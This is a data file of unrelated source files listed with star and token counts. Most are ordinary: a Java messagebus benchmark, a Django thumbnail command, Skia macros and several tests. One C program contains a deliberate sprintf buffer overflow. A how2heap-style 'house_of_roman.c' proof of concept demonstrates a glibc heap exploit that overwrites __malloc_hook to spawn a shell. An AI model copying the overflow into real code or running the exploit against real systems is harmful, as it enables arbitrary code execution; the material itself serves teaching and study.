max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
4,054 | <filename>messagebus_test/src/tests/speed/JavaClient.java
// Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
import com.yahoo.messagebus.*;
import com.yahoo.messagebus.test.*;
import com.yahoo.config.*;
import com.yahoo.messagebus.routing.*;
import com.yahoo.messagebus.network.*;
import com.yahoo.messagebus.network.rpc.*;
import java.util.Arrays;
import java.util.logging.*;
public class JavaClient implements ReplyHandler {
private static Logger log = Logger.getLogger(JavaClient.class.getName());
private static class Counts {
public int okCnt = 0;
public int failCnt = 0;
Counts() {}
Counts(int okCnt, int failCnt) {
this.okCnt = okCnt;
this.failCnt = failCnt;
}
}
private SourceSession session;
private Counts counts = new Counts();
private static long mySeq = 100000;
public JavaClient(RPCMessageBus mb) {
session = mb.getMessageBus().createSourceSession(this, new SourceSessionParams().setTimeout(30));
}
public synchronized Counts sample() {
return new Counts(counts.okCnt, counts.failCnt);
}
public void send() {
send(++mySeq);
}
public void send(long seq) {
session.send(new MyMessage(seq), "test");
}
public void handleReply(Reply reply) {
if ((reply.getProtocol() == SimpleProtocol.NAME)
&& (reply.getType() == SimpleProtocol.REPLY)
&& (((SimpleReply)reply).getValue().equals("OK")))
{
synchronized (this) {
counts.okCnt++;
}
} else {
synchronized (this) {
counts.failCnt++;
}
}
try {
send();
} catch (IllegalStateException ignore) {} // handle paranoia for shutdown source sessions
}
public void shutdown() {
session.destroy();
}
public static void main(String[] args) {
try {
RPCMessageBus mb = new RPCMessageBus(
new MessageBusParams()
.setRetryPolicy(new RetryTransientErrorsPolicy().setBaseDelay(0.1))
.addProtocol(new SimpleProtocol()),
new RPCNetworkParams()
.setIdentity(new Identity("server/java"))
.setSlobrokConfigId("file:slobrok.cfg"),
"file:routing.cfg");
JavaClient client = new JavaClient(mb);
// let the system 'warm up'
Thread.sleep(5000);
// inject messages into the feedback loop
for (int i = 0; i < 1024; ++i) {
client.send(i);
}
// let the system 'warm up'
Thread.sleep(5000);
long start;
long stop;
Counts before;
Counts after;
start = System.currentTimeMillis();
before = client.sample();
Thread.sleep(10000); // Benchmark time
stop = System.currentTimeMillis();
after = client.sample();
stop -= start;
double time = (double)stop;
double msgCnt = (double)(after.okCnt - before.okCnt);
double throughput = (msgCnt / time) * 1000.0;
System.out.printf("JAVA-CLIENT: %g msg/s\n", throughput);
client.shutdown();
mb.destroy();
if (after.failCnt > before.failCnt) {
System.err.printf("JAVA-CLIENT: FAILED (%d -> %d)\n",
before.failCnt, after.failCnt);
System.exit(1);
}
} catch (Exception e) {
log.log(Level.SEVERE, "JAVA-CLIENT: Failed", e);
System.exit(1);
}
}
private static class MyMessage extends SimpleMessage {
final long seqId;
MyMessage(long seqId) {
super("message");
this.seqId = seqId;
}
@Override
public boolean hasSequenceId() {
return true;
}
@Override
public long getSequenceId() {
return seqId;
}
}
}
| 1,972 |
345 | <reponame>michael-hahn/django-lfs
import os
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Regenerate thumbnails for Shop, Category and Image models if they are missing.'
def handle(self, *args, **options):
from django.conf import settings
from lfs.core.models import Shop
from lfs.core.fields import thumbs
from lfs.catalog.settings import THUMBNAIL_SIZES
from lfs.catalog.models import Category
from lfs.catalog.models import Image
for m in [Shop, Category, Image]:
for o in m.objects.all():
img_file = getattr(o, 'image')
if img_file.name:
self.stdout.write("Converting %s" % img_file.name)
for size in THUMBNAIL_SIZES:
(w, h) = size
split = img_file.name.rsplit('.', 1)
thumb_name = '%s.%sx%s.%s' % (split[0], w, h, split[1])
if os.path.isfile("%s/%s" % (settings.MEDIA_ROOT, thumb_name)):
self.stdout.write("\tSize %sx%s already exists" % (w, h))
continue
thumb_content = thumbs.generate_thumb(img_file, size, split[1])
img_file.storage.save(thumb_name, thumb_content)
self.stdout.write("\tSize %sx%s created" % (w, h))
| 747 |
5,620 | <reponame>zha0/how2heap<filename>glibc_2.23/house_of_roman.c
#define _GNU_SOURCE /* for RTLD_NEXT */
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <malloc.h>
#include <dlfcn.h>
char* shell = "/bin/sh\x00";
/*
Technique was tested on GLibC 2.23, 2.24 via the glibc_build.sh script inside of how2heap on Ubuntu 16.04. 2.25 was tested on Ubuntu 17.04.
Compile: gcc -fPIE -pie house_of_roman.c -o house_of_roman
POC written by <NAME> (Strikeout)
*/
// Use this in order to turn off printf buffering (messes with heap alignment)
void* init(){
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
}
int main(){
/*
The main goal of this technique is to create a **leakless** heap
exploitation technique in order to get a shell. This is mainly
done using **relative overwrites** in order to get pointers in
the proper locations without knowing the exact value of the pointer.
The first step is to get a pointer inside of __malloc_hook. This
is done by creating a fastbin bin that looks like the following:
ptr_to_chunk -> ptr_to_libc. Then, we alter the ptr_to_libc
(with a relative overwrite) to point to __malloc_hook.
The next step is to run an unsorted bin attack on the __malloc_hook
(which is now controllable from the previous attack). Again, we run
the unsorted_bin attack by altering the chunk->bk with a relative overwrite.
Finally, after launching the unsorted_bin attack to put a libc value
inside of __malloc_hook, we use another relative overwrite on the
value of __malloc_hook to point to a one_gadget, system or some other function.
Now, the next time we run malloc we pop a shell! :)
However, this does come at a cost: 12 bits of randomness must be
brute forced (0.02% chance) of working.
The original write up for the *House of Roman* can be found at
https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc#assumptions.
This technique requires the ability to edit fastbin and unsorted bin
pointers via UAF or overflow of some kind. Additionally, good control
over the allocations sizes and freeing is required for this technique.
*/
char* introduction = "\nWelcome to the House of Roman\n\n"
"This is a heap exploitation technique that is LEAKLESS.\n"
"There are three stages to the attack: \n\n"
"1. Point a fastbin chunk to __malloc_hook.\n"
"2. Run the unsorted_bin attack on __malloc_hook.\n"
"3. Relative overwrite on main_arena at __malloc_hook.\n\n"
"All of the stuff mentioned above is done using two main concepts:\n"
"relative overwrites and heap feng shui.\n\n"
"However, this technique comes at a cost:\n"
"12-bits of entropy need to be brute forced.\n"
"That means this technique only work 1 out of every 4096 tries or 0.02%.\n"
"**NOTE**: For the purpose of this exploit, we set the random values in order to make this consisient\n\n\n";
puts(introduction);
init();
/*
Part 1: Fastbin Chunk points to __malloc_hook
Getting the main_arena in a fastbin chunk ordering is the first step.
This requires a ton of heap feng shui in order to line this up properly.
However, at a glance, it looks like the following:
First, we need to get a chunk that is in the fastbin with a pointer to
a heap chunk in the fd.
Second, we point this chunk to a pointer to LibC (in another heap chunk).
All of the setup below is in order to get the configuration mentioned
above setup to perform the relative overwrites. ";
Getting the pointer to libC can be done in two ways:
- A split from a chunk in the small/large/unsorted_bins
gets allocated to a size of 0x70.
- Overwrite the size of a small/large chunk used previously to 0x71.
For the sake of example, this uses the first option because it
requires less vulnerabilities.
*/
puts("Step 1: Point fastbin chunk to __malloc_hook\n\n");
puts("Setting up chunks for relative overwrites with heap feng shui.\n");
// Use this as the UAF chunk later to edit the heap pointer later to point to the LibC value.
uint8_t* fastbin_victim = malloc(0x60);
// Allocate this in order to have good alignment for relative
// offsets later (only want to overwrite a single byte to prevent
// 4 bits of brute on the heap).
malloc(0x80);
// Offset 0x100
uint8_t* main_arena_use = malloc(0x80);
// Offset 0x190
// This ptr will be used for a relative offset on the 'main_arena_use' chunk
uint8_t* relative_offset_heap = malloc(0x60);
// Free the chunk to put it into the unsorted_bin.
// This chunk will have a pointer to main_arena + 0x68 in both the fd and bk pointers.
free(main_arena_use);
/*
Get part of the unsorted_bin chunk (the one that we just freed).
We want this chunk because the fd and bk of this chunk will
contain main_arena ptrs (used for relative overwrite later).
The size is particularly set at 0x60 to put this into the 0x70 fastbin later.
This has to be the same size because the __malloc_hook fake
chunk (used later) uses the fastbin size of 0x7f. There is
a security check (within malloc) that the size of the chunk matches the fastbin size.
*/
puts("Allocate chunk that has a pointer to LibC main_arena inside of fd ptr.\n");
//Offset 0x100. Has main_arena + 0x68 in fd and bk.
uint8_t* fake_libc_chunk = malloc(0x60);
//// NOTE: This is NOT part of the exploit... \\\
// The __malloc_hook is calculated in order for the offsets to be found so that this exploit works on a handful of versions of GLibC.
long long __malloc_hook = ((long*)fake_libc_chunk)[0] - 0xe8;
// We need the filler because the overwrite below needs
// to have a ptr in the fd slot in order to work.
//Freeing this chunk puts a chunk in the fd slot of 'fastbin_victim' to be used later.
free(relative_offset_heap);
/*
Create a UAF on the chunk. Recall that the chunk that fastbin_victim
points to is currently at the offset 0x190 (heap_relative_offset).
*/
free(fastbin_victim);
/*
Now, we start doing the relative overwrites, since that we have
the pointers in their proper locations. The layout is very important to
understand for this.
Current heap layout:
0x0: fastbin_victim - size 0x70
0x70: alignment_filler - size 0x90
0x100: fake_libc_chunk - size 0x70
0x170: leftover_main - size 0x20
0x190: relative_offset_heap - size 0x70
bin layout:
fastbin: fastbin_victim -> relative_offset_heap
unsorted: leftover_main
Now, the relative overwriting begins:
Recall that fastbin_victim points to relative_offset_heap
(which is in the 0x100-0x200 offset range). The fastbin uses a singly
linked list, with the next chunk in the 'fd' slot.
By *partially* editing the fastbin_victim's last byte (from 0x90
to 0x00) we have moved the fd pointer of fastbin_victim to
fake_libc_chunk (at offset 0x100).
Also, recall that fake_libc_chunk had previously been in the unsorted_bin.
Because of this, it has a fd pointer that points to main_arena + 0x68.
Now, the fastbin looks like the following:
fastbin_victim -> fake_libc_chunk ->(main_arena + 0x68).
The relative overwrites (mentioned above) will be demonstrates step by step below.
*/
puts("\
Overwrite the first byte of a heap chunk in order to point the fastbin chunk\n\
to the chunk with the LibC address\n");
puts("\
Fastbin 0x70 now looks like this:\n\
heap_addr -> heap_addr2 -> LibC_main_arena\n");
fastbin_victim[0] = 0x00; // The location of this is at 0x100. But, we only want to overwrite the first byte. So, we put 0x0 for this.
/*
Now, we have a fastbin that looks like the following:
0x70: fastbin_victim -> fake_libc_chunk -> (main_arena + 0x68)
We want the fd ptr in fake_libc_chunk to point to something useful.
So, let's edit this to point to the location of the __malloc_hook.
This way, we can get control of a function ptr.
To do this, we need a valid malloc size. Within the __memalign_hook
is usually an address that usually starts with 0x7f.
Because __memalign_hook value is right before this are all 0s,
we could use a misaligned chunk to get this to work as a valid size in
the 0x70 fastbin.
This is where the first 4 bits of randomness come into play.
The first 12 bits of the LibC address are deterministic for the address.
However, the next 4 (for a total of 2 bytes) are not.
So, we have to brute force 2^4 different possibilities (16)
in order to get this in the correct location. This 'location'
is different for each version of GLibC (should be noted).
After doing this relative overwrite, the fastbin looks like the following:
0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23).
*/
/*
Relatively overwrite the main_arena pointer to point to a valid
chunk close to __malloc_hook.
///// NOTE: In order to make this exploit consistent
(not brute forcing with hardcoded offsets), we MANUALLY set the values. \\\
In the actual attack, this values would need to be specific
to a version and some of the bits would have to be brute forced
(depending on the bits).
*/
puts("\
Use a relative overwrite on the main_arena pointer in the fastbin.\n\
Point this close to __malloc_hook in order to create a fake fastbin chunk\n");
long long __malloc_hook_adjust = __malloc_hook - 0x23; // We substract 0x23 from the malloc because we want to use a 0x7f as a valid fastbin chunk size.
// The relative overwrite
int8_t byte1 = (__malloc_hook_adjust) & 0xff;
int8_t byte2 = (__malloc_hook_adjust & 0xff00) >> 8;
fake_libc_chunk[0] = byte1; // Least significant bytes of the address.
fake_libc_chunk[1] = byte2; // The upper most 4 bits of this must be brute forced in a real attack.
// Two filler chunks prior to the __malloc_hook chunk in the fastbin.
// These are fastbin_victim and fake_libc_chunk.
puts("Get the fake chunk pointing close to __malloc_hook\n");
puts("\
In a real exploit, this would fail 15/16 times\n\
because of the final half byet of the malloc_hook being random\n");
malloc(0x60);
malloc(0x60);
// If the 4 bit brute force did not work, this will crash because
// of the chunk size not matching the bin for the chunk.
// Otherwise, the next step of the attack can begin.
uint8_t* malloc_hook_chunk = malloc(0x60);
puts("Passed step 1 =)\n\n\n");
/*
Part 2: Unsorted_bin attack
Now, we have control over the location of the __malloc_hook.
However, we do not know the address of LibC still. So, we cannot
do much with this attack. In order to pop a shell, we need
to get an address at the location of the __malloc_hook.
We will use the unsorted_bin attack in order to change the value
of the __malloc_hook with the address of main_arena + 0x68.
For more information on the unsorted_bin attack, review
https://github.com/shellphish/how2heap/blob/master/glibc_2.26/unsorted_bin_attack.c.
For a brief overview, the unsorted_bin attack allows us to write
main_arena + 0x68 to any location by altering the chunk->bk of
an unsorted_bin chunk. We will choose to write this to the
location of __malloc_hook.
After we overwrite __malloc_hook with the main_arena, we will
edit the pointer (with a relative overwrite) to point to a
one_gadget for immediate code execution.
Again, this relative overwrite works well but requires an additional
1 byte (8 bits) of brute force.
This brings the chances of a successful attempt up to 12 bits of
randomness. This has about a 1/4096 or a 0.0244% chance of working.
The steps for phase two of the attack are explained as we go below.
*/
puts("\
Start Step 2: Unsorted_bin attack\n\n\
The unsorted bin attack gives us the ability to write a\n\
large value to ANY location. But, we do not control the value\n\
This value is always main_arena + 0x68. \n\
We point the unsorted_bin attack to __malloc_hook for a \n\
relative overwrite later.\n");
// Get the chunk to corrupt. Add another ptr in order to prevent consolidation upon freeing.
uint8_t* unsorted_bin_ptr = malloc(0x80);
malloc(0x30); // Don't want to consolidate
puts("Put chunk into unsorted_bin\n");
// Free the chunk to create the UAF
free(unsorted_bin_ptr);
/* /// NOTE: The last 4 bits of byte2 would have been brute forced earlier. \\\
However, for the sake of example, this has been calculated dynamically.
*/
__malloc_hook_adjust = __malloc_hook - 0x10; // This subtract 0x10 is needed because of the chunk->fd doing the actual overwrite on the unsorted_bin attack.
byte1 = (__malloc_hook_adjust) & 0xff;
byte2 = (__malloc_hook_adjust & 0xff00) >> 8;
// Use another relative offset to overwrite the ptr of the chunk->bk pointer.
// From the previous brute force (4 bits from before) we
// know where the location of this is at. It is 5 bytes away from __malloc_hook.
puts("Overwrite last two bytes of the chunk to point to __malloc_hook\n");
unsorted_bin_ptr[8] = byte1; // Byte 0 of bk.
// //// NOTE: Normally, the second half of the byte would HAVE to be brute forced. However, for the sake of example, we set this in order to make the exploit consistent. ///
unsorted_bin_ptr[9] = byte2; // Byte 1 of bk. The second 4 bits of this was brute forced earlier, the first 4 bits are static.
/*
Trigger the unsorted bin attack.
This will write the value of (main_arena + 0x68) to whatever is in the bk ptr + 0x10.
A few things do happen though:
- This makes the unsorted bin (hence, small and large too)
unusable. So, only allocations previously in the fastbin can only be used now.
- If the same size chunk (the unsorted_bin attack chunk)
is NOT malloc'ed, the program will crash immediately afterwards.
So, the allocation request must be the same as the unsorted_bin chunk.
The first point is totally fine (in this attack). But, in more complicated
programming, this can be an issue.
The second just requires us to do the same size allocaton as the current chunk.
*/
puts("Trigger the unsorted_bin attack\n");
malloc(0x80); // Trigger the unsorted_bin attack to overwrite __malloc_hook with main_arena + 0x68
long long system_addr = (long long)dlsym(RTLD_NEXT, "system");
puts("Passed step 2 =)\n\n\n");
/*
Step 3: Set __malloc_hook to system
The chunk itself is allocated 19 bytes away from __malloc_hook.
So, we use a realtive overwrite (again) in order to partially overwrite
the main_arena pointer (from unsorted_bin attack) to point to system.
In a real attack, the first 12 bits are static (per version).
But, after that, the next 12 bits must be brute forced.
/// NOTE: For the sake of example, we will be setting these values, instead of brute forcing them. \\\
*/
puts("Step 3: Set __malloc_hook to system/one_gadget\n\n");
puts("\
Now that we have a pointer to LibC inside of __malloc_hook (from step 2), \n\
we can use a relative overwrite to point this to system or a one_gadget.\n\
Note: In a real attack, this would be where the last 8 bits of brute forcing\n\
comes from.\n");
malloc_hook_chunk[19] = system_addr & 0xff; // The first 12 bits are static (per version).
malloc_hook_chunk[20] = (system_addr >> 8) & 0xff; // The last 4 bits of this must be brute forced (done previously already).
malloc_hook_chunk[21] = (system_addr >> 16) & 0xff; // The last byte is the remaining 8 bits that must be brute forced.
malloc_hook_chunk[22] = (system_addr >> 24) & 0xff; // If the gap is between the data and text section is super wide, this is also needed. Just putting this in to be safe.
// Trigger the malloc call for code execution via the system call being ran from the __malloc_hook.
// In a real example, you would probably want to use a one_gadget.
// But, to keep things portable, we will just use system and add a pointer to /bin/sh as the parameter
// Although this is kind of cheating (the binary is PIE), if the binary was not PIE having a pointer into the .bss section would work without a single leak.
// To get the system address (eariler on for consistency), the binary must be PIE though. So, the address is put in here.
puts("Pop Shell!");
malloc((long long)shell);
}
| 5,334 |
320 |
/**
* Write a description of class bubble here.
*
* @author (your name)
* @version (a version number or a date)
*/
public class SortBubble
{ public static void main()
{ int i, j, temp;
int a[] = {4, 6, 3, 2, 1, 8}; //Can be taken as an input
int n = a.length;
for(i = 0; i < n - 1; i++)
{ for(j = 0; j < n - i - 1; j++) //where i is a pass
{ if(a[j]>a[j+1])
{
int t2 = a[j];
int t3 = a[j+1];
temp = a[j];
a[j] = a[j+1];
a[j+1] = temp;
}
}
}
System.out.println("The given array in ascending order is as follows: ");
System.out.println(a);
for(i=0; i < a.length; i++) //loop for printing array
{ System.out.print(a[i] + " "); }
}
}
| 619 |
415 | #include <stdio.h>
// The code is vulnerable on purpose
int main (int argc, char**argv) {
char buf[30];
sprintf(buf, "Provided value = %s", argv[1]);
puts(buf);
return(0);
}
| 81 |
528 | // This file is composed from parts from skia library (https://github.com/google/skia/)
// Please check skia license if it fits (https://github.com/google/skia/blob/master/LICENSE)
#if !defined(SK_CPU_BENDIAN) && !defined(SK_CPU_LENDIAN)
#if defined(__sparc) || defined(__sparc__) || \
defined(_POWER) || defined(__powerpc__) || \
defined(__ppc__) || defined(__hppa) || \
defined(__PPC__) || defined(__PPC64__) || \
defined(_MIPSEB) || defined(__ARMEB__) || \
defined(__s390__) || \
(defined(__sh__) && defined(__BIG_ENDIAN__)) || \
(defined(__ia64) && defined(__BIG_ENDIAN__))
#define SK_CPU_BENDIAN
#else
#define SK_CPU_LENDIAN
#endif
#endif
#define SK_A32_BITS 8
#define SK_R32_BITS 8
#define SK_G32_BITS 8
#define SK_B32_BITS 8
#ifdef SK_CPU_BENDIAN
#define SK_R32_SHIFT 24
#define SK_G32_SHIFT 16
#define SK_B32_SHIFT 8
#define SK_A32_SHIFT 0
#else
#define SK_R32_SHIFT 0
#define SK_G32_SHIFT 8
#define SK_B32_SHIFT 16
#define SK_A32_SHIFT 24
#endif
#define SK_A32_MASK ((1 << SK_A32_BITS) - 1)
#define SK_R32_MASK ((1 << SK_R32_BITS) - 1)
#define SK_G32_MASK ((1 << SK_G32_BITS) - 1)
#define SK_B32_MASK ((1 << SK_B32_BITS) - 1)
#define SkGetPackedA32(packed) ((uint32_t)((packed) << (24 - SK_A32_SHIFT)) >> 24)
#define SkGetPackedR32(packed) ((uint32_t)((packed) << (24 - SK_R32_SHIFT)) >> 24)
#define SkGetPackedG32(packed) ((uint32_t)((packed) << (24 - SK_G32_SHIFT)) >> 24)
#define SkGetPackedB32(packed) ((uint32_t)((packed) << (24 - SK_B32_SHIFT)) >> 24)
#define SK_R16_BITS 5
#define SK_G16_BITS 6
#define SK_B16_BITS 5
#define SK_R16_SHIFT (SK_B16_BITS + SK_G16_BITS)
#define SK_G16_SHIFT (SK_B16_BITS)
#define SK_B16_SHIFT 0
#define SK_R16_MASK ((1 << SK_R16_BITS) - 1)
#define SK_G16_MASK ((1 << SK_G16_BITS) - 1)
#define SK_B16_MASK ((1 << SK_B16_BITS) - 1)
#define SkGetPackedR16(color) (((unsigned)(color) >> SK_R16_SHIFT) & SK_R16_MASK)
#define SkGetPackedG16(color) (((unsigned)(color) >> SK_G16_SHIFT) & SK_G16_MASK)
#define SkGetPackedB16(color) (((unsigned)(color) >> SK_B16_SHIFT) & SK_B16_MASK)
static inline unsigned SkR16ToR32(unsigned r)
{
return (r << (8 - SK_R16_BITS)) | (r >> (2 * SK_R16_BITS - 8));
}
static inline unsigned SkG16ToG32(unsigned g)
{
return (g << (8 - SK_G16_BITS)) | (g >> (2 * SK_G16_BITS - 8));
}
static inline unsigned SkB16ToB32(unsigned b)
{
return (b << (8 - SK_B16_BITS)) | (b >> (2 * SK_B16_BITS - 8));
}
#define SkPacked16ToR32(c) SkR16ToR32(SkGetPackedR16(c))
#define SkPacked16ToG32(c) SkG16ToG32(SkGetPackedG16(c))
#define SkPacked16ToB32(c) SkB16ToB32(SkGetPackedB16(c))
| 1,379 |
14,668 | import itertools
__all__ = ["apply_mask"]
def apply_mask(data: bytes, mask: bytes) -> bytes:
"""
Apply masking to the data of a WebSocket message.
:param data: Data to mask
:param mask: 4-bytes mask
"""
if len(mask) != 4:
raise ValueError("mask must contain 4 bytes")
return bytes(b ^ m for b, m in zip(data, itertools.cycle(mask)))
| 140 |
7,451 | from ..field import Field
from ..scalars import String
class CustomField(Field):
def __init__(self, *args, **kwargs):
self.metadata = kwargs.pop("metadata", None)
super(CustomField, self).__init__(*args, **kwargs)
def test_mounted_type():
unmounted = String()
mounted = Field.mounted(unmounted)
assert isinstance(mounted, Field)
assert mounted.type == String
def test_mounted_type_custom():
unmounted = String(metadata={"hey": "yo!"})
mounted = CustomField.mounted(unmounted)
assert isinstance(mounted, CustomField)
assert mounted.type == String
assert mounted.metadata == {"hey": "yo!"}
| 222 |
1,431 | /* ====================================================================
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==================================================================== */
package org.apache.poi.ss.formula.functions;
import static org.apache.poi.ss.util.Utils.addRow;
import static org.apache.poi.ss.util.Utils.assertDouble;
import static org.junit.jupiter.api.Assertions.assertEquals;
import org.apache.poi.hssf.usermodel.HSSFCell;
import org.apache.poi.hssf.usermodel.HSSFFormulaEvaluator;
import org.apache.poi.hssf.usermodel.HSSFSheet;
import org.apache.poi.hssf.usermodel.HSSFWorkbook;
import org.apache.poi.ss.formula.eval.ErrorEval;
import org.apache.poi.ss.formula.eval.NumberEval;
import org.apache.poi.ss.formula.eval.StringEval;
import org.apache.poi.ss.formula.eval.ValueEval;
import org.junit.jupiter.api.Test;
import java.io.IOException;
/**
* Tests for {@link Quotient}
*/
class TestQuotient {
private static ValueEval invokeValue(String numerator, String denominator) {
ValueEval[] args = new ValueEval[]{new StringEval(numerator), new StringEval(denominator)};
return new Quotient().evaluate(args, -1, -1);
}
private static void confirmValue(String msg, String numerator, String denominator, String expected) {
ValueEval result = invokeValue(numerator, denominator);
assertEquals(NumberEval.class, result.getClass());
assertEquals(expected, ((NumberEval) result).getStringValue(), msg);
}
private static void confirmValueError(String msg, String numerator, String denominator, ErrorEval numError) {
ValueEval result = invokeValue(numerator, denominator);
assertEquals(ErrorEval.class, result.getClass());
assertEquals(numError, result, msg);
}
@Test
void testBasic() {
confirmValue("Integer portion of 5/2 (2)", "5", "2", "2");
confirmValue("Integer portion of 4.5/3.1 (1)", "4.5", "3.1", "1");
confirmValue("Integer portion of -10/3 (-3)", "-10", "3", "-3");
confirmValue("Integer portion of -5.5/2 (-2)", "-5.5", "2", "-2");
confirmValue("Integer portion of Pi/Avogadro (0)", "3.14159", "6.02214179E+23", "0");
}
@Test
void testErrors() {
confirmValueError("numerator is nonnumeric", "ABCD", "", ErrorEval.VALUE_INVALID);
confirmValueError("denominator is nonnumeric", "", "ABCD", ErrorEval.VALUE_INVALID);
confirmValueError("dividing by zero", "3.14159", "0", ErrorEval.DIV_ZERO);
}
@Test
void testWithCellRefs() throws IOException {
try (HSSFWorkbook wb = new HSSFWorkbook()) {
HSSFSheet sheet = wb.createSheet();
addRow(sheet, 0, 5, 2);
HSSFFormulaEvaluator fe = new HSSFFormulaEvaluator(wb);
HSSFCell cell = wb.getSheetAt(0).getRow(0).createCell(100);
assertDouble(fe, cell, "QUOTIENT(A1, B1)", 2.0);
}
}
} | 1,333 |
24,910 | from .keccak import SHA3
__all__ = ['SHA3']
| 19 |
636 | <gh_stars>100-1000
from indy import payment
import json
import pytest
get_auth_rule_resp = {
"result": {
"data": [{
"new_value": "0",
"constraint": {
"need_to_be_owner": False,
"sig_count": 1,
"metadata": {
"fees": "1"
},
"role": "0",
"constraint_id": "ROLE"
},
"field": "role",
"auth_type": "1",
"auth_action": "ADD"
}],
"identifier": "LibindyDid111111111111",
"auth_action": "ADD",
"new_value": "0",
"reqId": 15616,
"auth_type": "1",
"type": "121",
"field": "role"
},
"op": "REPLY"
}
requester_info = {
"role": "0",
"need_to_be_owner": False,
"sig_count": 1,
}
fees = {
"1": 100
}
@pytest.mark.asyncio
async def test_get_request_info():
request_info = await payment.get_request_info(json.dumps(get_auth_rule_resp), json.dumps(requester_info),
json.dumps(fees))
expected_request_info = {
'price': 100,
'requirements': [{
'role': '0',
'need_to_be_owner': False,
'sig_count': 1,
}]
}
request_info = json.loads(request_info)
assert expected_request_info == request_info
| 795 |
34,359 | /*++
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
Module Name:
- IAccessibilityNotifier.hpp
Abstract:
- OneCore implementation of the IAccessibilityNotifier interface.
Author(s):
- <NAME> (HeGatta) 29-Mar-2017
--*/
#pragma once
#include "../inc/IAccessibilityNotifier.hpp"
#pragma hdrstop
namespace Microsoft::Console::Interactivity::OneCore
{
class AccessibilityNotifier : public IAccessibilityNotifier
{
public:
void NotifyConsoleCaretEvent(_In_ const til::rect& rectangle) noexcept override;
void NotifyConsoleCaretEvent(_In_ ConsoleCaretEventFlags flags, _In_ LONG position) noexcept override;
void NotifyConsoleUpdateScrollEvent(_In_ LONG x, _In_ LONG y) noexcept override;
void NotifyConsoleUpdateSimpleEvent(_In_ LONG start, _In_ LONG charAndAttribute) noexcept override;
void NotifyConsoleUpdateRegionEvent(_In_ LONG startXY, _In_ LONG endXY) noexcept override;
void NotifyConsoleLayoutEvent() noexcept override;
void NotifyConsoleStartApplicationEvent(_In_ DWORD processId) noexcept override;
void NotifyConsoleEndApplicationEvent(_In_ DWORD processId) noexcept override;
};
}
| 426 |
571 | """
Copyright 2021 Nirlep_5252_
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import dbl
from discord.ext import commands
from config import TOP_GG_TOKEN, EMOJIS
from utils.bot import EpicBot
class TopGG(commands.Cog):
def __init__(self, client: EpicBot):
self.client = client
self.token = TOP_GG_TOKEN
self.vote_c_id = 776015595354325002
self.dblpy = dbl.DBLClient(
self.client,
self.token,
webhook_path='/sus',
webhook_auth='<PASSWORD>',
webhook_port=8080
)
# this does not work
# shocker
@commands.Cog.listener()
async def on_dbl_vote(self, data):
user = self.client.get_user(data['user'])
channel = self.client.get_channel(self.vote_c_id)
await channel.send(f"Thank you {user.mention} for voting! {EMOJIS['heawt']}")
@commands.Cog.listener()
async def on_dbl_test(self, data):
test_user = self.client.get_user(data['user'])
channel = self.clent.get_channel(self.vote_c_id)
await channel.send(f"webhooks works lmfao {test_user.mention}")
def setup(client):
client.add_cog(TopGG(client))
| 664 |
852 | <filename>IOPool/Input/test/test_empty_old_formats_cfg.py
import FWCore.ParameterSet.Config as cms
import sys
process = cms.Process("OLDREAD")
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring("file:"+sys.argv[2]))
| 117 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-8w58-xxg8-xq44",
"modified": "2022-05-01T06:47:13Z",
"published": "2022-05-01T06:47:13Z",
"aliases": [
"CVE-2006-1229"
],
"details": "SQL injection vulnerability in search.asp in Hosting Controller 6.1 (Hotfix 2.9) allows remote attackers to execute arbitrary SQL commands via the search parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-1229"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25140"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/19191"
},
{
"type": "WEB",
"url": "http://www.osvdb.org/23802"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2006/0914"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "HIGH",
"github_reviewed": false
}
} | 508 |
619 | //
// Public.h
// Project
//
// Created by <NAME> on 11.07.17.
// Copyright © 2017 es.ppinera. All rights reserved.
//
#ifndef Public_h
#define Public_h
#endif /* Public_h */
| 71 |
1,137 | <reponame>jayten42/pororo<filename>tests/test_semantic_role_labeling.py
"""Test Semantic Role Labeling module"""
import unittest
from pororo import Pororo
class PororoSRLTester(unittest.TestCase):
def test_modules(self):
srl = Pororo(task="srl", lang="ko")
srl_res = srl("카터는 역삼에서 카카오브레인으로 출근한다.")
self.assertIsInstance(srl_res, list)
if __name__ == "__main__":
unittest.main()
| 217 |
9,782 | <reponame>willianfonseca/presto<filename>presto-hive/src/main/java/com/facebook/presto/hive/HiveZeroRowFileCreator.java
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
